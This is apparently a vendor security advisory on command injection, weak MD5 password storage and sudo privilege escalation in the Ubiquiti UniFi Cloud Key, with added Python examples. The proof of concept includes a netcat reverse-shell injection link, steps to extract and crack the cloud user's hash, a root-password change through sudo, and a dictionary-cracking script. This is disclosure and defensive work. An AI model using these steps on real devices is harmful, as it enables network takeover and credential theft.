Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities

Project Description

The Ubiquiti UniFi Cloud Key is prone to command injection in the administrative interface. When an attacker lures a user into upgrading the firmware with a fake update link, the attacker can take over the device and the attached access points. In addition, the cloud user account password can be cracked.


 

Vendor description

“Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets.”

Source: http://ir.ubnt.com/

 

Business recommendation

SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.

 

Vulnerability overview/description

 

1) Authenticated Command Injection & Cloud User Weak Crypto

The manual UniFi Cloud Key firmware upgrade function is prone to a command injection vulnerability, which can be exploited for example by sending a manipulated upgrade link to a victim.

A reverse shell can be used to get access to the device, which in turn gives an attacker access to the internal network of the attacked user. The web user is “www-data”, which has only limited access and execution rights, but by exploiting vulnerability 2) it is possible to gain root access on the device!

After a successful command injection the cloud user account password hash can be dumped. Since the UniFi Cloud Key has to communicate with the access points and configure their passwords as well, the hash has to be stored somewhere other than /etc/shadow so that it can be pushed to the devices. The hashes are stored in “system.cfg” using only the MD5 hashing algorithm, which can be cracked easily in reasonable time.

This configuration file contains the username and the password hash of the cloud user, which is the same on all access points and the UniFi Cloud Key.

This configuration file can be read by the user “www-data”. Afterwards, the hash can be cracked and the cloud user is hijacked. Remote configuration of the user's wireless LAN is then possible for an attacker.

 

2) Privilege Escalation

The password of the root user can be changed by a lower-privileged user on the device. This is possible because some binaries can be executed with sudo by this user without the root password.

 

Proof of concept

 

1) Authenticated Command Injection & Cloud-User Hash Leak

The following PHP snippet is responsible for the command execution:

(api.inc, line 476)

exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);
return CMD_WGET . $url . CMD_WGET_OPTIONS;
}
[...]

The following link opens a reverse-shell:

;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;

To ‘hide’ the command from the user in the upgrade window, one can also decorate the link:

;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin

As listener, netcat was used:

$ nc -lvp <Attacker-Port>
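The following is an added example and not code from the advisory or from the Cloud Key firmware. It reproduces the shape of the api.inc line (CMD_WGET . $url . CMD_WGET_OPTIONS handed to a shell) in Python and places a hardened download step beside it. The values of CMD_WGET and CMD_WGET_OPTIONS, the allowed download host and the use of Python instead of the firmware's PHP are assumptions made for the example; "echo" is prefixed to the stand-in wget command so the demonstration runs offline.

```python
"""Added example: why the api.inc string concatenation is a command
injection, and one hardened form. Not the Cloud Key's own code."""
import subprocess
from urllib.parse import urlparse

# Stand-ins for the firmware's constants (assumed values). "echo" is
# prefixed so nothing is actually downloaded when the demo runs.
CMD_WGET = "echo wget "
CMD_WGET_OPTIONS = " -O /tmp/fwupdate.bin"

# Assumed policy for the hardened version: HTTPS only, from a fixed host.
ALLOWED_HOSTS = {"dl.ubnt.com"}

# Characters that have meaning to /bin/sh; rejected as defence in depth.
SHELL_META = set(";|&`$'\"\\ \n\r<>()")


def vulnerable_download(url: str) -> str:
    """Mirrors api.inc: the URL is glued into one string that /bin/sh parses,
    so anything after an unquoted ';' in the 'URL' runs as its own command.
    Returns the shell's stdout."""
    cmdline = CMD_WGET + url + CMD_WGET_OPTIONS
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout


def safe_download_argv(url: str) -> list:
    """Hardened form: validate the URL, then build an argv list so no shell
    ever sees it. (In PHP this corresponds to a whitelist check plus
    escapeshellarg(), or not using exec() for the download at all.)"""
    parts = urlparse(url)
    if parts.scheme != "https":
        raise ValueError("firmware URL must use https")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted firmware host: {parts.hostname!r}")
    if SHELL_META & set(url):
        raise ValueError("unexpected characters in firmware URL")
    # argv list: the URL is a single argument, whatever it contains.
    return ["wget", "-q", url, "-O", "/tmp/fwupdate.bin"]


def is_acceptable_url(url: str) -> bool:
    """True if the hardened check would let the URL through."""
    try:
        safe_download_argv(url)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # The decorated link from the PoC, with a harmless echo in place of nc.
    print(vulnerable_download(";echo INJECTED; https://secconsult.build-1337.bin"))
    print(is_acceptable_url(";echo INJECTED; https://secconsult.build-1337.bin"))
    print(safe_download_argv("https://dl.ubnt.com/firmware/UCK.bin"))
```

The argv list is what actually removes the injection; the character filter only adds a second line of defence and would not be sufficient on its own.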

To hijack the cloud account, steal username and password hash:

(user: www-data)
$ cd /srv/unifi/data/devices/uap/
$ ls
<serial-number-of-an-ap>
$ cd <serial-number-of-an-ap>
$ grep "users\.1\.name" system.cfg
users.1.name=<username>
$ grep "users\.1\.password" system.cfg
users.1.password=<password-hash>

The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg the same password is just MD5 hashed and can be cracked easily in reasonable time.
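As an added example, not part of the advisory, the following Python parses a system.cfg fragment for the users.N.name/users.N.password entries and runs a dictionary attack against the hash. The sample configuration and wordlist are constructed for the example, and the hash is assumed to be an unsalted hex MD5 digest as the advisory describes; if the field turns out to be a salted md5crypt string ($1$...), the same dictionary attack applies with an md5crypt routine (hashcat mode 500 instead of mode 0).

```python
"""Added example: pull the cloud user out of a Ubiquiti-style system.cfg
and crack the MD5 hash. Not the advisory's own code."""
import hashlib
import re
from typing import Optional

# Constructed sample of the key=value layout seen in system.cfg.
# The hash is md5("password"); no salt, no work factor.
SAMPLE_SYSTEM_CFG = """\
users.status=enabled
users.1.status=enabled
users.1.name=cloudadmin
users.1.password=5f4dcc3b5aa765d61d8327deb882cf99
"""

# Constructed wordlist standing in for rockyou.txt or similar.
WORDLIST = ["ubnt", "admin", "123456", "password", "letmein"]

CFG_LINE = re.compile(r"^users\.(\d+)\.(name|password)=(.*)$")


def parse_users(cfg_text: str) -> dict:
    """Return {index: {"name": ..., "password": ...}} for every users.N.* entry."""
    users = {}
    for line in cfg_text.splitlines():
        m = CFG_LINE.match(line.strip())
        if m:
            idx, key, value = int(m.group(1)), m.group(2), m.group(3)
            users.setdefault(idx, {})[key] = value
    return users


def crack_md5(hex_digest: str, candidates) -> Optional[str]:
    """Unsalted MD5: one hashlib call per guess, which is why a wordlist
    (or a GPU rig) gets through realistic passwords quickly."""
    target = hex_digest.strip().lower()
    for guess in candidates:
        if hashlib.md5(guess.encode()).hexdigest() == target:
            return guess
    return None


def hijack_candidates(cfg_text: str, wordlist) -> list:
    """(username, cleartext) pairs recovered from the configuration."""
    found = []
    for entry in parse_users(cfg_text).values():
        if "name" in entry and "password" in entry:
            pw = crack_md5(entry["password"], wordlist)
            if pw is not None:
                found.append((entry["name"], pw))
    return found


if __name__ == "__main__":
    print(hijack_candidates(SAMPLE_SYSTEM_CFG, WORDLIST))
```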

 

2) Privilege Escalation

Because of the following line in /etc/sudoers.d/cloudkey-webui, one can elevate the rights of www-data to root:

(cloudkey-webui, line 1)

www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service unifi *, /usr/bin/java

With the following commands one can change the root password without actually knowing it:

(user: www-data)
$ cd /tmp
$ echo "root:password" > newfile.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt

The root password is now changed to ‘password’.

SSH login as root is then also possible:

$ ssh root@<IP-Address>
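The following is an added example and not part of the advisory: a small audit of sudoers rules of the kind found in /etc/sudoers.d/cloudkey-webui. It flags passwordless rules granted to service accounts, commands allowed without any argument restriction, wildcard arguments, and commands that give root code execution or credential changes (apt-get and java through their well-known option and -jar tricks, ubnt-systool through the chpasswd subcommand used in the PoC). The lists of service accounts and dangerous commands, and the tightened replacement rule, are assumptions made for this example; the parser handles the simple "user host=(runas)TAG:cmd, cmd" form, not the full sudoers grammar.

```python
"""Added example: audit sudoers rules like the cloudkey-webui one.
Not the advisory's or Ubiquiti's own code."""
import re

# The rule quoted in the advisory, and an assumed tightened replacement that
# only allows the one service action the web UI needs.
CLOUDKEY_RULE = ("www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, "
                 "/usr/sbin/service unifi *, /usr/bin/java")
TIGHTENED_RULE = "www-data ALL=NOPASSWD:/usr/sbin/service unifi restart"

# Assumed: accounts that should never hold passwordless root helpers.
SERVICE_ACCOUNTS = {"www-data", "nobody", "unifi"}

# Assumed: commands that run arbitrary code or change credentials as root.
DANGEROUS = {"apt-get", "java", "ubnt-systool", "chpasswd", "passwd", "sh", "bash"}

RULE = re.compile(
    r"^(?P<user>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rule(line: str) -> dict:
    """Split one sudoers line into user, host, runas, tags and command list."""
    m = RULE.match(line.strip())
    if not m:
        raise ValueError(f"unsupported sudoers line: {line!r}")
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user"), "host": m.group("host"),
            "runas": m.group("runas") or "root", "tags": tags, "cmds": cmds}


def audit_rule(line: str) -> list:
    """Return a list of human-readable findings for one sudoers line."""
    rule = parse_rule(line)
    findings = []
    if "NOPASSWD" in rule["tags"] and rule["user"] in SERVICE_ACCOUNTS:
        findings.append(f"{rule['user']}: NOPASSWD rule for a service account")
    for cmd in rule["cmds"]:
        path, *args = cmd.split()
        name = path.rsplit("/", 1)[-1]
        if cmd == "ALL":
            findings.append("ALL: any command may be run")
            continue
        if name in DANGEROUS:
            findings.append(f"{cmd}: code execution or credential change as {rule['runas']}")
        if not args:
            findings.append(f"{cmd}: no argument restriction")
        if any("*" in a for a in args):
            findings.append(f"{cmd}: wildcard arguments")
    return findings


if __name__ == "__main__":
    for rule in (CLOUDKEY_RULE, TIGHTENED_RULE):
        print(rule)
        for f in audit_rule(rule):
            print("  -", f)
```

Even the tightened rule still reports the passwordless grant to www-data; whether that residual finding is acceptable depends on what the web UI genuinely needs root for, which is the question a review of such a helper should start from.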

 

Vulnerable / tested versions

Ubiquiti Networks UniFi Cloud Key firmware versions 0.5.9/0.6.0 have been tested. These were the latest versions at the time the security vulnerabilities were discovered.

 

Vendor contact timeline

2017-02-03: Contacting vendor via HackerOne.
2017-02-05: Providing PoC video via HackerOne.
2017-02-06: Vendor sets status to “Triaged”.
2017-02-21: Asking for a status update; no answer.
2017-03-01: Informing the vendor that the advisory will be published on 2017-03-27; no answer.
2017-03-17: Asking for a status update.
2017-03-20: Vendor states that a fix will be available in v0.6.1.
2017-03-21: Asking vendor when the update will be available. Found update on vendor homepage (available since 2017-03-20).
2017-03-21: Vendor asks for more time. Release date set to 2017-06-25.
2017-03-27: Fixed version is available; providing at least 90 days for customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-06-27.
2017-06-26: Shifted publication date back to 2017-07-27 to give customers more time to apply the patch.
2017-07-27: Public release of security advisory.

 

Solution

Upgrade to firmware v0.6.1 or later.

 

Workaround

None

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF T. Weber / @2017

 

Project Details

  • Title: SEC Consult Vulnerability Lab Security Advisory < 20170727-0 > Authenticated Command Injection & Cloud User Weak Crypto & Privilege Escalation
  • Product: Ubiquiti Networks UniFi Cloud Key
  • Vulnerable version: Firmware v0.5.9/0.6.0
  • Fixed version: Firmware v0.6.1
  • CVE number: --
  • Impact: Critical
  • Homepage: https://www.ubnt.com
  • Found: 2017-01-31
  • By: T. Weber (Office Vienna) / SEC Consult Vulnerability Lab
